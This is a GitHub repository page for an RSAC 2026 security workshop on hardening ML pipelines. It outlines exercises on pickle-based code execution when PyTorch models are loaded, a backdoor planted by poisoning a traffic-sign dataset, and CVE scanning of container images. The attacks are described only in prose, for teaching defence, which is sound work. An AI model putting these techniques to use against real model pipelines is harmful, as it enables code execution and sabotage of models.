Skip to content

chainguard-demo/ml-pipeline-security

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

25 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Securing ML Pipelines: Way More Than You Wanted to Know

  • Session page — RSAC 2026 Learning Lab [LAB2-W08]
  • Wednesday, March 25, 1:15–3:15 PM PDT
  • Dr. Patrick Smyth, Principal Developer Relations Engineer, Chainguard

ML pipelines are vulnerable due to the immaturity of the ecosystem, the large attack surface of popular ML frameworks, and the unique properties of ML models. In this technical workshop, participants will put on their plumber hats and get dirty hardening vulnerable ML pipelines, covering safe model deserialization, training data ingestion, and infrastructure deployment.


Prerequisites

Docker and Grype are required. See PREREQUISITES.md for install instructions covering macOS, Windows, and Linux.


Exercises

PyTorch models use pickle. Pickle executes arbitrary code on load. We'll exploit this, then switch to SafeTensors as the safe alternative.

An attacker poisons a traffic sign dataset so that a yellow sticker on a stop sign makes the model predict "yield." We'll demonstrate the backdoor, then show how training on clean data prevents it.

We'll scan Python container images with Grype and compare CVE counts across base image choices — from hundreds of vulnerabilities down to zero.

About

Materials for ML Pipeline Security: Way More Than You Wanted to Know Learning Lab at RSAC 2026

Topics

Resources

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors